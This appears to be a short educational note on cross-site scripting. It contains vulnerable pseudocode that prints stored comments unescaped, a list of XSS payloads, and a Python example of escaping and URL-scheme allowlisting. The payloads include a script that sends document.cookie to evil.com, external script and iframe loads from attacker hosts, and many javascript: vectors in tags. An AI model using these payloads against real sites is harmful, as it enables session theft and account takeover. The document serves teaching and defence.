A3 CROSS-SITE SCRIPTING (XSS)

print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"
<html><h1>Most recent comment</h1><script>doSomethingEvil();</script></html>
<script>window.location="http://evil.com/?cookie=" + document.cookie</script>
<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>
<!-- onload attribute in the <body> tag -->
<body onload=alert("XSS")>
<!-- background attribute -->
<body background="javascript:alert("XSS")">
<!-- <img> tag XSS -->
<img src="javascript:alert("XSS");">
<!-- <img> tag XSS using lesser-known attributes -->
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
<!-- <iframe> tag XSS -->
<iframe src="http://evil.com/xss.html">
<!-- <input> tag XSS -->
<input type="image" src="javascript:alert('XSS');">
<!-- <link> tag XSS -->
<link rel="stylesheet" href="javascript:alert('XSS');">
<!-- <table> tag XSS -->
<table background="javascript:alert('XSS')">
<!-- <td> tag XSS -->
<td background="javascript:alert('XSS')">
<!-- <div> tag XSS -->
<div style="background-image: url(javascript:alert('XSS'))">
<!-- <div> tag XSS -->
<div style="width: expression(alert('XSS'));">
<!-- <object> tag XSS -->
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">
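
An added example, not part of the original article: a hardened Python form of the comment-printing pseudocode above, which HTML-encodes the stored comment before writing it into the page, together with a scheme allowlist for the `javascript:` URL forms in the list. The function names and the http/https allowlist are assumptions made for this sketch.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Assumption: the application only needs to link to ordinary web resources.
ALLOWED_SCHEMES = {"http", "https"}

def render_latest_comment(comment: str) -> str:
    """Hardened form of the pseudocode: the comment is HTML-encoded, so the
    browser shows it as text instead of parsing it as markup."""
    return ("<html><h1>Most recent comment</h1>"
            + html.escape(comment, quote=True)
            + "</html>")

def safe_url(url: str) -> Optional[str]:
    """Return the URL if it is absolute http(s), otherwise None."""
    # Drop whitespace and control characters first: browsers ignore some of
    # them inside a scheme, so "java\tscript:" must not slip past the check.
    cleaned = "".join(ch for ch in url if ch > " ")
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return cleaned

def render_image(url: str) -> str:
    """Emit an <img> tag only for allowlisted URLs, with the attribute value
    encoded so a quote in the URL cannot close the attribute."""
    checked = safe_url(url)
    if checked is None:
        return ""
    return '<img src="' + html.escape(checked, quote=True) + '">'

if __name__ == "__main__":
    # Constructed inputs, taken from the payload forms listed above.
    print(render_latest_comment("<script>doSomethingEvil();</script>"))
    print(repr(render_image("javascript:alert('XSS')")))
    print(render_image("https://example.com/avatar.png"))
```

These two functions cover HTML text content and URL-valued attributes only. User input should not be placed in `style` values or event-handler attributes such as `onload`, which need their own context-specific handling.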

Cyber Security Researcher https://twitter.com/Computeus7

Ahmet PAYASLIOĞLU